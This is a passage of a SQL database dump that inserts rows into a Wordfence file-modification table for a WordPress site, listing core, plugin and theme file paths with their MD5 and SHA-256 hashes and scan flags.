(0x79b405ed1ddd459061ccf33a128d5b00, 'wp-includes/class.wp-dependencies.php', 1, 0x00000000000000000000000000000000, 0xd28ec37e40a8dbdbed4d5816f54602d2, 0x201b335ebe99c988eb05b34de40e9296d241f3d1082b5e87181ebf15debc3207, '', 0, '?');
INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
(0x79bd0eeb57899bc38ce5aef2686d6f39, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-row.php', 0, 0xeb171faba0bb088337cb215f99bb8151, 0xeb171faba0bb088337cb215f99bb8151, 0x432db016ec25802dd0dc1fc9fc5f5fc3a952de247a7765674928858cc69c4736, '', 0, '?'),
(0x79bfabeb18c69d17d279a8f37bd54959, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/creative-link.min.js', 0, 0x5535c1641645851b6d3968dd8ac481ec, 0x5535c1641645851b6d3968dd8ac481ec, 0xfd3e6132d7734c86d85a685a6799286c21cb1b5a750b69ad2fe13faa05f6f50a, '', 0, '?'),
(0x79c270ba146e564a6d0aebc2ae50a8b6, 'wp-content/plugins/js_composer/include/helpers/class-vc-color-helper.php', 0, 0x64698fa8230d03114f66938fb9bb7338, 0x64698fa8230d03114f66938fb9bb7338, 0x1bb35d52d9d5d0b241339bc4a5aa9b1d8eb82c2b971fddc1074b3edaad0e308a, '', 0, '?'),
(0x79c7acdb7dbbb62afafb4ba52aa40fe6, 'wp-content/plugins/js_composer/include/templates/pages/vc-welcome/vc-resources.php', 0, 0x8f6dea4670fd8003876410a518114869, 0x8f6dea4670fd8003876410a518114869, 0x08a346abaebde0ca23c69721e1c89ed78f1d035a6740789aed50f0ea24271a37, '', 0, '?'),
(0x79cafef55e651d49380b38f348a150a6, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-cart.svg', 0, 0xbbb1b84b2dbbaf6bfdbbe0cb9e3c00de, 0xbbb1b84b2dbbaf6bfdbbe0cb9e3c00de, 0xaae702c7c27d00f8772f0c544178fc7a032b7e184c596f2ec410ee5a1410798d, '', 0, '?'),
(0x79ea018ee447955c6098e1f9a24d5294, 'wp-admin/network/site-new.php', 1, 0x00000000000000000000000000000000, 0x71056fde18fb27a3c48015c63cecbe61, 0x84051de2e4f32b724109d9e8806cc8717ae86b244633f20399ebcaf380c6af70, '', 0, '?'),
(0x79f80f86e740272153cac06510f75e8a, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_google_maps.php', 0, 0x4d8e3282889479fc2d7b8f0f7e9048e8, 0x4d8e3282889479fc2d7b8f0f7e9048e8, 0x3def5523c74a88333b491ad0c2cb4344399d8da3c7a1f2998422637f4e5d86a4, '', 0, '?'),
(0x79f973eacc32a06c80e09d71a021bddb, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_backup_restore_24px.svg', 0, 0x04145ba6330f74f75fdd4530f65b015d, 0x04145ba6330f74f75fdd4530f65b015d, 0x459d134f70fe404bad4df8f6582c8511fa30269f28a362acced1edc20d412fad, '', 0, '?'),
(0x7a00da916c654cb4bb9438629cfa3aad, 'wp-content/themes/Impreza/framework/functions/migration.php', 0, 0x6eea0a0018b22b6666f579dec8acf62f, 0x6eea0a0018b22b6666f579dec8acf62f, 0xcff3f9e8d85bf57b5694163055551e172074d546fc012397f453ea149db36fa1, '', 0, '?'),
(0x7a0ec990b59b8240f62fce172f1e40a0, 'wp-content/plugins/wordfence/views/waf/options-group-advanced-firewall.php', 1, 0x00000000000000000000000000000000, 0xfc49ee074eeaf07ef88a64f746a765a7, 0x6c15426f98539baae614ba29dea539b9ac6fb19821c7bb156dc29beacc231724, '', 0, '?'),
(0x7a16316fb2c9bc83bd4002c98561f4df, 'wp-content/plugins/js_composer/config/content/shortcode-vc-column-text.php', 0, 0xbc401596148bb9daf239646e5e023c8c, 0xbc401596148bb9daf239646e5e023c8c, 0x5a563e935a50d728c50cbc0e30029b13f8715c5cb496ecfb7c6cc84313adb69d, '', 0, '?'),
(0x7a2e5bc7fd441519113810811752d40f, 'wp-includes/js/codemirror/jsonlint.js', 1, 0x00000000000000000000000000000000, 0x49296679dee36b0c548c2bcaed3cd59f, 0x9324443b3baf80b47f9e30c5d6081bff46f87e709218f847d29346b9cb81a685, '', 0, '?'),
(0x7a3a32afacb66d4d768a4beedb990b75, 'wp-content/plugins/js_composer/include/templates/shortcodes/post_block/_item.php', 0, 0x3e3dfd4ce0266b938c2088f88eb33dd1, 0x3e3dfd4ce0266b938c2088f88eb33dd1, 0xf4eb6c9522d457da337b54dc6fdab18d29ebd0622fad3a06e6ceb2fa69467522, '', 0, '?'),
(0x7a3b6a325744ba36b28c115ba1170856, 'wp-admin/js/accordion.js', 1, 0x00000000000000000000000000000000, 0xf2086c19efb64a0b66f05f46dd35ae9b, 0xbf1e3c8b5352d1a4759591ad14060b618ca09dbdc6dc786d97630491e37b6b3f, '', 0, '?'),
(0x7a52a9010bff9a0e08afca796393a0e4, 'wp-content/plugins/wordfence/js/admin.ajaxWatcher.1579191227.js', 1, 0x00000000000000000000000000000000, 0x434357d8fcba1a14179afe5e626544a9, 0x09c91515fb43a24aad684624441071d87ce9e2022cac3745483b99994ecacacf, '', 0, '?'),
(0x7a594c3e8197df3e256ff23ea692c0ba, 'wp-content/themes/Impreza/404.php', 0, 0x57f4e500b884326c729194ea0117c88a, 0x57f4e500b884326c729194ea0117c88a, 0xb77ad54ddaa6575b5ec102f06e16888fa31e7cf11cdfc05a381730e6e43b59a1, '', 0, '?'),
(0x7a6fb886dcb21319887ea1137fe18862, 'wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php', 1, 0x00000000000000000000000000000000, 0x9490874b0d1c7f1134582ec7f91e9099, 0x6c85aa76cd6cd9095d28efe6da57b13707eb0e8490a02b13979730a8062dbe99, '', 0, '?'),
(0x7a78625c412855aa876bec3aaa99ba66, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_movie_filter_24px.svg', 0, 0x2ec40b7fafa921c1e674e15465fb2c50, 0x2ec40b7fafa921c1e674e15465fb2c50, 0xb0d9e796817417e3e6bdda30af17e928cc258b04444510f110fc16991204ac9b, '', 0, '?'),
(0x7a886d9553161941fd7d0749bcfeb429, 'wp-includes/sodium_compat/namespaced/Compat.php', 1, 0x00000000000000000000000000000000, 0x41f269ea6bb22fcae5bf6a0d6e138e33, 0x31c027a7b6878fd5bb2e12ec4fd0e07d1335ba410b6669a47e9da23eee3a7d73, '', 0, '?'),
(0x7aa235b72a1a41445a436bace16aae92, 'wp-content/plugins/wordfence/images/icons/magnifier.png', 1, 0x00000000000000000000000000000000, 0xa81fa78d754fae7b3a71026356e3ee27, 0x0e99206174bfbf769dba6451c3eba83028ec496aaec696904fa7a2152465282a, '', 0, '?'),
(0x7aa29ae5914ca9a335096735b5c48eac, 'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php', 1, 0x00000000000000000000000000000000, 0x74d772e849a6b1af620377272d37ed9a, 0xb375a953d57b95fc3cf80e1993f46e0ddf852b2d0e23b23bbb0be1b78351d0ae, '', 0, '?'),
(0x7aa88b8fdf3820104cf27b9fd3f57105, 'wp-content/plugins/wordfence/lib/menu_scanner.php', 1, 0x00000000000000000000000000000000, 0xf5ddbbe779afb1be7aea06ed087c90ac, 0x2d75ddbcda3ebeccba6e7e75827426efd2d029460626c73b71b3664a6b53bc4f, '', 0, '?'),
(0x7aa8af513c929827199a80557ed4525c, 'wp-includes/css/wp-embed-template.min.css', 1, 0x00000000000000000000000000000000, 0x24bd34d51376d78109ab3bcb61b66621, 0xa2d402519ba779ea674126f0aeab54809feb636ab653380a78a5a8ba2e3d44d3, '', 0, '?'),
(0x7aabb1e870233ea41ec5fde2a629340f, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-user.svg', 0, 0x87324dc258d42c89224a398e1b8a9936, 0x87324dc258d42c89224a398e1b8a9936, 0x0dbb6a1e3782e649388cff66723610ab9dc452cca098c13b564416d91a318d4d, '', 0, '?'),
(0x7aacf6d5ef4a58d4777b210d46abc0ba, 'wp-admin/includes/class-wp-upgrader-skins.php', 1, 0x00000000000000000000000000000000, 0x5122fa8390bc8dc8d29115e12dd18915, 0x2ea19937046a333fccb6cacbc2b73f8b11a132165593458e2e9347cc0657191f, '', 0, '?'),
(0x7ab75583252630892d5fb5e406799685, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_quote_24px.svg', 0, 0x85f15145131bac072f9f584ea9990266, 0x85f15145131bac072f9f584ea9990266, 0x6b98b85c946ff7f4a158f8ddd663175d3f5cd8abc32c05d4c9635b58775f8d37, '', 0, '?'),
(0x7ac87bf9fc9031cfe8d31be36de600de, 'wp-content/themes/Impreza/framework/widgets/us_login.php', 0, 0x4f40150e8ed50af6c1b37bb037769db8, 0x4f40150e8ed50af6c1b37bb037769db8, 0xbbdac90a1e4be82276f6a0f924b179149cdfc9b532366028c1ac3240da7697d2, '', 0, '?'),
(0x7ac8c638e0cda48e7b777e6e8fa794ff, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_ParamHeading.php', 0, 0x06333a00b4af23ef83f1f73206a8a16c, 0x06333a00b4af23ef83f1f73206a8a16c, 0xc33909c2a80188b5bfb2ff30e8f6627146917e1111c1e2de75ccb7a7f30a1b53, '', 0, '?'),
(0x7ac9bf619b5a1bc039551e8d901c7c4b, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/ihover.min.js', 0, 0xdeff9e0d00d76f6bd6d7d6a957c4e765, 0xdeff9e0d00d76f6bd6d7d6a957c4e765, 0x9b97f2f9a9d80b1f54488f178c478da31d17faabd99b3e2ff3622ca137699b3d, '', 0, '?'),
(0x7ace04cc6d9da9c4bf18d3331519fd26, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure07.svg', 0, 0xa28a98f55e8134d9c89adac1d0cac220, 0xa28a98f55e8134d9c89adac1d0cac220, 0xb7a67c3afde72058b9505c53710b5ada7ff4aabc938706f93df6ab81dd2bce1f, '', 0, '?'),
(0x7ae71e24dd2f6bb75595aede3f61e9e5, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_accordion_tab.js', 0, 0x6e927adec63c4fc4d58c1a2c3eed0e61, 0x6e927adec63c4fc4d58c1a2c3eed0e61, 0xb47856779dd2912b54a6652460c8ee660615dd7d9a047e1be7d57ff015bb4100, '', 0, '?'),
(0x7ae9a53321e119baa1906508c363aa92, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart04.svg', 0, 0xbfb357586efe13eeb490190964e747ea, 0xbfb357586efe13eeb490190964e747ea, 0xe955448dc5b87d0c24d6966d49e73341bdb4a342880fcc27e3e6a47748f18944, '', 0, '?'),
(0x7af769d371c3f46c0a2c830dcd7e47e4, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_team.php', 0, 0x0800b58e122b545b32ef0a7f74507c26, 0x0800b58e122b545b32ef0a7f74507c26, 0xdeeffc471573e007de675ac2e646ff0341bd1f6cf86b4884cdbdb13dfa14ce63, '', 0, '?'),
(0x7b0a1f84d5e552a06fade6523d2767c0, 'wp-admin/js/widgets/custom-html-widgets.min.js', 1, 0x00000000000000000000000000000000, 0xd3810da7cecafa8ef492ef7760efdbc2, 0xa25475774a9bcb6a9e37ca72d4491e90e1429ea9d82a994ff86f392d9d85ddf8, '', 0, '?'),
(0x7b1017d792755a04eecf5b97a8ddbdef, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_restore_24px.svg', 0, 0x4080fe2eff021dd76a98cb9d463a6d66, 0x4080fe2eff021dd76a98cb9d463a6d66, 0x1d3729c4fd5ca8d0ce2a00641d752e69e254bb62cffca238e986bce29a4f5a5d, '', 0, '?'),
(0x7b184ea488c832ed51ae75d4de3d099c, 'wp-admin/network/theme-editor.php', 1, 0x00000000000000000000000000000000, 0x5e1829bf1794ce06c5ad77b7e2d17142, 0x342856740aaddaa26ef738445b937192876c7022a7ba8e9f1d1ae8cf3cb2f693, '', 0, '?'),
(0x7b299e61712c384e71bd7c6e546da6a9, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_justify_24px.svg', 0, 0xf3da2da9dea8e0f61f3ed1dd49f75e92, 0xf3da2da9dea8e0f61f3ed1dd49f75e92, 0xfe180e6174f3e78276a6044ff419cd09b212dae3d0e594fa6be1489bc51d148a, '', 0, '?'),
(0x7b2bc78295c92a5d3469409363d5ff1b, 'wp-content/themes/Impreza/framework/templates/elements/additional_menu.php', 0, 0x8b6c8da860ddd5d0bd435daf65dff50a, 0x8b6c8da860ddd5d0bd435daf65dff50a, 0x0e17fca80395bfb07c5d8caff7505a3a195a921ba1c82f371ca7969cb1ef63ca, '', 0, '?'),
(0x7b5be32f12c1b0b386061dda91cefd84, 'wp-content/plugins/wordfence/views/dashboard/option-howgetips.php', 1, 0x00000000000000000000000000000000, 0x90eccfa498535a323de4a8cfc78cf55e, 0x9e0094fdd48af477aaf91a291789b9368b5a7016bb2da21c6c502dda4e9d44c8, '', 0, '?'),
(0x7b74c8457eaa7fcc50db41b431f8a003, 'wp-admin/js/tags.js', 1, 0x00000000000000000000000000000000, 0x52d5d3f67a30c1ce0f451f08aa5b97ff, 0xa5443add7fb39aaed2a0ff8b035fd44c8b258136ad43f3f9877dcbcb62015563, '', 0, '?'),
(0x7b7922b614d2b5b5d0dda9b67b8dad9d, 'wp-admin/includes/class-walker-category-checklist.php', 1, 0x00000000000000000000000000000000, 0x3a65469c8606a877a0dd7d4763e7fe1e, 0x80ea26662e8561a06c96df7ba80a19b3538509c34c1228498ab5882476de8dbf, '', 0, '?'),
(0x7b9d6ac4c98f7c6ee4095e3cf857489e, 'wp-includes/css/dist/nux/style-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x093f88e78124c68bbc7f81cc9664985e, 0x43a2d21eccde163e7ea189a989d62c5a574987c0694b1876979fdd01528b2047, '', 0, '?'),
(0x7b9f1f29d734653402703ab106665787, 'wp-includes/js/jquery/jquery.query.js', 1, 0x00000000000000000000000000000000, 0x3bcc587af2c7b01fc6fbc9c077050143, 0xf41775c8675e88e5e4882b15ff9b69b9ab6db0c8ea470d46a8789569f0581494, '', 0, '?'),
(0x7baf6ec56b7c06cdd91550237ee53229, 'wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/auto-update/admin-functions.php', 0, 0x5869aebefc39d407fb3e1f387dd21bc0, 0x5869aebefc39d407fb3e1f387dd21bc0, 0xa73df219aa431993a86013e3cb15721f300b733652fc8554d72323682325d426, '', 0, '?'),
(0x7bbb4eee83a3ac9a6bcc320cdb78bc97, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-chart2.svg', 0, 0x7b4582f64dc90150e9718c7229ccbc36, 0x7b4582f64dc90150e9718c7229ccbc36, 0x663f6086d2e3bb64866686365cd374c63b52a11860a39e4533641a78bd23d4c0, '', 0, '?'),
(0x7bd40560f883be70a5b2c19e19a592ab, 'wp-content/themes/Impreza/framework/templates/elements/post_title.php', 0, 0x38137a12f1d100d0858e17ff4d8d13b3, 0x38137a12f1d100d0858e17ff4d8d13b3, 0x830f984b28d741707d5507e984c944f13a1138e693c8a34c57b0bf06d9e360cf, '', 0, '?'),
(0x7bef52431bbc01da1a8f2e2a22a25118, 'wp-includes/feed.php', 1, 0x00000000000000000000000000000000, 0xdcc981debb5182c9c6de22c81edac141, 0xe85f1abfa287f7075a8eec1fc72956f5ea2a004bd5bb42341b6231c66917568d, '', 0, '?'),
(0x7bef7b79ed98b0a1be3d03d1957a4e27, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_exposure_plus_1_24px.svg', 0, 0x42fbd95ccf52746f1f7c735dcb29307f, 0x42fbd95ccf52746f1f7c735dcb29307f, 0x20fbdf37c5ef8db3866b75a775c4c5183531dcdc049b1a79324e0fc6a71283a5, '', 0, '?'),
(0x7bf10dde0f080c2d11e4dc7da05ee9c6, 'wp-includes/images/smilies/frownie.png', 1, 0x00000000000000000000000000000000, 0x519bf3d0051b841e0cb08dc4f4831eed, 0x72f47ed7447a6fd1f768dfb197d2d3041216befed8bb221c3e45842b944b6585, '', 0, '?'),
(0x7bf52f356e1c0edb09c3287964a98748, 'wp-content/themes/Impreza/framework/templates/footer.php', 0, 0x8bdb97f0ce5a4b1c70fb3941c9650f59, 0x8bdb97f0ce5a4b1c70fb3941c9650f59, 0x0c8089d1b7d691bc485e6a4a8ebf8b1f7c99f9f16130243a6081b2f1223ca181, '', 0, '?'),
(0x7bf5871f903fecd1d5fc0d92da0a1b27, 'wp-admin/images/imgedit-icons.png', 1, 0x00000000000000000000000000000000, 0x4bd55c320b9fd9d8127da94789693b4f, 0x54ce4ec27e88e5f72dc340b0e84e8314d0cc9e1156e75ca6942875182405d5e9, '', 0, '?'),
(0x7c056aaa957837c728517d8e30c027f0, 'wp-admin/css/list-tables.css', 1, 0x00000000000000000000000000000000, 0xdf2291c2b2d7db61ec1759a80639ae6a, 0x1642c151ea9113f387764906641176ac77464f01d50b20267bdb6184927755fc, '', 0, '?'),
(0x7c07ac43e15344f12743f39a93f04881, 'wp-content/themes/Impreza/framework/templates/l-header.php', 0, 0x438b9966d3b16a3659e0588a01876807, 0x438b9966d3b16a3659e0588a01876807, 0x1359870ddb0bcf9cd148ea83675cab2d7ddef340526a4a77408e0492be0206c9, '', 0, '?'),
(0x7c2d1bd9fdd3ca06937afec7032dbf1d, 'wp-admin/export-personal-data.php', 1, 0x00000000000000000000000000000000, 0xd476def1d9d5f76019f74f1ca8a79185, 0x30c2b6e97d241ffaf7d69e33b909233b22ce97532f795cb9ce689981179510fc, '', 0, '?'),
(0x7c2fda92eb005b2a3493ff7805fc01e3, 'wp-includes/js/admin-bar.js', 1, 0x00000000000000000000000000000000, 0xd2a25830f7004da7b426e628e4d3642a, 0x7b39f1c0a46da0f63cf9a61dec655041020c1d8721d75aed71451e95415621af, '', 0, '?'),
(0x7c4e21a03b78e34e26ae7f67d9ef6df9, 'wp-admin/js/widgets/media-image-widget.min.js', 1, 0x00000000000000000000000000000000, 0x5cdd681b80ed5519adb2c9607f04d23c, 0x65155e6a0dbe0dd5de3b505e64e95efe1f8978023e61252e2a5e5747bb0e18c7, '', 0, '?'),
(0x7c5aed1f45c2337e504393b38f58a725, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hand-key.svg', 0, 0xc61fa4342e082c474b5cf1fd694022e7, 0xc61fa4342e082c474b5cf1fd694022e7, 0x8288c8cfecea82114d3465b471d91a7e2e5692e266ce90c6c19b03995f39ed74, '', 0, '?'),
(0x7c66fa4400cd9c60e1a38b3a04dc84c7, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/vc_tta_tour.php', 0, 0x80859bd62e896c4fadf325c28eac1005, 0x80859bd62e896c4fadf325c28eac1005, 0xb125db0c945c01e089f02cbe50c62034bc3a867cb1a8bd0c6639ff3f4df3f982, '', 0, '?'),
(0x7c6cf32b4616fbba23da9fbdacebc3f0, 'wp-includes/class-wp-user-request.php', 1, 0x00000000000000000000000000000000, 0x81786093c1cd7da5ccc81b62efaf7df2, 0x3812fd917a39a7bd8e2c7f99b4ccc28a51e70052fd57609338dd9bd3c79dca55, '', 0, '?'),
(0x7c77d8c44349dcf9d40a84731a68c9b6, 'wp-content/plugins/revslider/admin/assets/imports/highlight-carousel/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x7c90258327c749ad1f1a7c3c08c70218, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_weekend_24px.svg', 0, 0xf438f954d8b388729ba81b09add588c0, 0xf438f954d8b388729ba81b09add588c0, 0x3264e27fc9123fdbbe7a41e5eb5a4e4d3df2967f759d58527c186bc97bdc2c98, '', 0, '?'),
(0x7c9130372d8f88821bb49cab36951959, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_check_36px.svg', 0, 0x6ba32c905a8faaaf0312144d93d83643, 0x6ba32c905a8faaaf0312144d93d83643, 0x207612482b5482cbb638f028791f65d3c28a05fc89c54119cbc9d6f9ba6ee21c, '', 0, '?'),
(0x7c9179c35fbde1266ed12008f92b0c91, 'wp-content/themes/Impreza/framework/admin/functions/grid-builder.php', 0, 0xdbf0e2d6def10524146e3fd3c5e7c977, 0xdbf0e2d6def10524146e3fd3c5e7c977, 0x1bb7e538e7dc0389dae1955f6b75b2a5bf2afa1ca65566a5b31160fe7bfc054f, '', 0, '?'),
(0x7c91fd43cf4a21a29042e6ffdca6059c, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_headings.php', 0, 0xf8efd286ec86b7c8b7ae757772dba8a7, 0xf8efd286ec86b7c8b7ae757772dba8a7, 0xf5c7576422ac44e89049689a07e0f909fbe333b494a4eb01d6a2015d875abc82, '', 0, '?'),
(0x7ca8147d44753d83d22f64c6cd1c4ed4, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/team.svg', 0, 0x528fd4bc38b43bdc421230a9bf3b59f7, 0x528fd4bc38b43bdc421230a9bf3b59f7, 0xb358a88bd0786057738056c5fe690e12f2f22ab3787a526ea551a7423c4c8b9c, '', 0, '?'),
(0x7caa1656d1983d159c5f0e0f97f98b31, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/classie.js', 0, 0xdd803c30594ad99cc6f8ade432cd6f76, 0xdd803c30594ad99cc6f8ade432cd6f76, 0x6d39bccd558025bce4687fbea2ef71cc880ab6a438e0f12274b44e8d777fae2f, '', 0, '?'),
(0x7cabf720b834e378e55cd0cf014df76e, 'wp-admin/js/code-editor.min.js', 1, 0x00000000000000000000000000000000, 0xcc5081a21ab16c3e074aea785487432b, 0xbb9fa832322801c2fda2972540f034fc68398459a48271f3a8e04a029e07eb24, '', 0, '?'),
(0x7cc95e3fd4bdb58b83efa7fc4a235b24, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_content_copy_24px.svg', 0, 0x5bf3128324a956d222ef8b94901821e1, 0x5bf3128324a956d222ef8b94901821e1, 0x8766a031bfbc79005080a80892795b2225d81a12ee458c73c4e748cd38159c44, '', 0, '?'),
(0x7cf7b8545dba873a59243d182768ba0b, 'wp-content/plugins/wordfence/views/scanner/issue-wfUpgrade.php', 1, 0x00000000000000000000000000000000, 0x95a3d3444fdb8f7ebb2a7316a10c2fc1, 0xc71bc863b15e00e9d55d2aceb68fd796bac15c9854316d736423dd20835e5597, '', 0, '?'),
(0x7cfebb598c1c3ee080d01d09f9c686c4, 'wp-admin/link-add.php', 1, 0x00000000000000000000000000000000, 0x8c4b18cd3f8fedd630e59b09181ec962, 0x11b26967e4e0561988145a92a3c5478ce2c646c4cced6cc580b94246c0830277, '', 0, '?'),
(0x7d05a8bdd9a0d61d47f1ff3d44e4b3f6, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/label.svg', 0, 0x35ba94d1c357e2106e1fe547543eef8d, 0x35ba94d1c357e2106e1fe547543eef8d, 0xbd5f4c46df1a98c2518378c70e77730ea33231ba631cb4ec9e93dd2b521281d7, '', 0, '?'),
(0x7d08c4893d9574a9adf291bb0113a4b9, 'wp-includes/images/toggle-arrow-2x.png', 1, 0x00000000000000000000000000000000, 0x46cae1ca5cf883f4c91243447215ef11, 0x2defbcd74e1791a8b0ddc5eabd377e40cb7d825fc93df6a48b56925f184041d5, '', 0, '?'),
(0x7d2928ada257f2e44308dfc1db0c431d, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/assets/js/unveil.js', 0, 0x100800f8ac2de5ef52ac101647c83adb, 0x100800f8ac2de5ef52ac101647c83adb, 0x413c0f9cc9e3668243a574fb70067082d8274b0d4c99d479d8a7150aaf0ccaf3, '', 0, '?'),
(0x7d51701795e9ac0bea7789149ed25118, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_trending_up_24px.svg', 0, 0x18f1b85ac16e9ea985afabd061674ad9, 0x18f1b85ac16e9ea985afabd061674ad9, 0xe8a5db7fafd4653cf3805367019702eb40f9cd2c619de90f88eab8998a239d34, '', 0, '?'),
(0x7d5ca435e60d92f024d46c9257aaa0f7, 'wp-admin/js/tags-suggest.js', 1, 0x00000000000000000000000000000000, 0x1e0f50a2947ccda6a1f9afbc3563b1d5, 0x85cc2c1f0c3de81f79c104448c773cefbc23270212ab3d1d16197c2ae70d0a52, '', 0, '?'),
(0x7d60c6d267220e50c932aec21c56bd87, 'wp-includes/images/spinner-2x.gif', 1, 0x00000000000000000000000000000000, 0x31fd991e90e6329d865e23e638b50ff4, 0xa0efaf08182396cb92cc3d2402630ea9a736c0dee418d2df09429d9934078136, '', 0, '?'),
(0x7d6efb18e59a382d713e11195781c49d, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/clock.svg', 0, 0x4f35bd4b6e5bb1c6990047c52bd8523b, 0x4f35bd4b6e5bb1c6990047c52bd8523b, 0x4bc2c4952a703bc3abf0ed2e5b1a6bfac20e628b994a4aed9c02a9bd239df460, '', 0, '?'),
(0x7d709d40d24bf992b5e4fb73567c2e58, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-de_DE.po', 1, 0x00000000000000000000000000000000, 0xc6ea9cf1f6c501c714517e60ea8487b6, 0xcba843dde45d5871d70ad3fc0023521cd4e8d8fd57e14b047dfbce1f00b44ca0, '', 0, '?'),
(0x7dbca38df9aa02d76287f67ee61dc604, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_recline_extra_24px.svg', 0, 0x90f59833d1d458c1d1b64709f3c01a51, 0x90f59833d1d458c1d1b64709f3c01a51, 0x254178c7ecdbef2538d0fded5f4d9993f8e253ca2f294c1b66e8066b4a686046, '', 0, '?'),
(0x7dc13720de98e64448441f0e11da506c, 'wp-includes/SimplePie/Registry.php', 1, 0x00000000000000000000000000000000, 0x1cc8a2e6c0b5dd3176398d6400f0d9b8, 0xccd998fdbea7c78d2b0ed4e682d42b924ef0deed549c1d6252dfd205f573e3ec, '', 0, '?'),
(0x7dd26ee9dd8d0fc0912d6d9272fbd722, 'wp-content/plugins/js_composer/include/classes/core/shared-templates/importer/class-vc-wxr-parser-xml.php', 0, 0x99697b236e3a11569beca83c03f290c1, 0x99697b236e3a11569beca83c03f290c1, 0x55d6a43b6641c9b81b7826ca498936ceaa132c97d744ee17fbd52bebf270ce87, '', 0, '?'),
(0x7de7edcb2e608945e174895fea7baf3e, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_strikethrough_24px.svg', 0, 0xb55b232cb727078d9a8ae62f18d7ebfc, 0xb55b232cb727078d9a8ae62f18d7ebfc, 0x2133eed34494f1a435b350cb383dafce03209e850a7a3a417656ca84d918aa31, '', 0, '?'),
(0x7defc890e68a5c4cfcaf608aa7e46929, 'wp-includes/ID3/license.txt', 1, 0x00000000000000000000000000000000, 0x47d8905625e6505f1117fa0ba8d5b7af, 0x8a493ecfd761a72a52387f3ff19629f670318955cd94c73f32c31d3d6f1997e7, '', 0, '?'),
(0x7df60715ea5c484ae6b172e4282829fe, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_cell_24px.svg', 0, 0xaa14c1240b3586510aa0d028ea686d83, 0xaa14c1240b3586510aa0d028ea686d83, 0x042e4cbc6394432813752be14668017516ceebf7b2db4108fbcce94ef3eeb037, '', 0, '?'),
(0x7dfdd6cb117b1552d2a2d4e08d1da222, 'wp-includes/default-constants.php', 1, 0x00000000000000000000000000000000, 0x6fbc605c8e4b60c2231596de2413e1a4, 0xf7f6d319c4d4068038ecac45b5688991cbfab88ae9122a0cc46941280c5f79ac, '', 0, '?'),
(0x7e115243dabea10b3cdd5d9ace04aef4, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_spa_24px.svg', 0, 0x5c69747d5d47d2e4849fdbc904281bf1, 0x5c69747d5d47d2e4849fdbc904281bf1, 0xd5fcde35d431c3f28bfba7f5935919788a59bba63d19494353bca27807bf28db, '', 0, '?'),
(0x7e14c8be2ffa086d1cdad680cd21fcec, 'wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php', 1, 0x00000000000000000000000000000000, 0xfc2610846d3a378be17681d73dcdea9e, 0xbfb30a1cc2ecc107ebfa71915997f09915dba13e066887fa8dcd5fc0c95086c5, '', 0, '?'),
(0x7e3dce62b7ea118491c8707ab4f4aa16, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_add_to_photos_24px.svg', 0, 0x1bf89bffd6d3d072c49ae14b82eddfc0, 0x1bf89bffd6d3d072c49ae14b82eddfc0, 0x1bcb9b4b8a0c69468e28fc367901cc760bc873c97410dc55eb5856c8c4bab641, '', 0, '?'),
(0x7e3fa14abc49d6622a15d7baea65e843, 'wp-admin/images/resize.gif', 1, 0x00000000000000000000000000000000, 0xcbd61f6c4eed10fb1317038905abc4cd, 0xa93611f3808fb802d701f38826133f03c335fad13f73fd71474d03601c50163b, '', 0, '?'),
(0x7e418b488467e799e9fea64b0b5480e9, 'wp-includes/Requests/Utility/CaseInsensitiveDictionary.php', 1, 0x00000000000000000000000000000000, 0xb5f03ac8c752b34b9e726f04d548327a, 0x3979d486262f4158088b48f2697b0162bbd3f786376691a5fd727792d1e33d6d, '', 0, '?'),
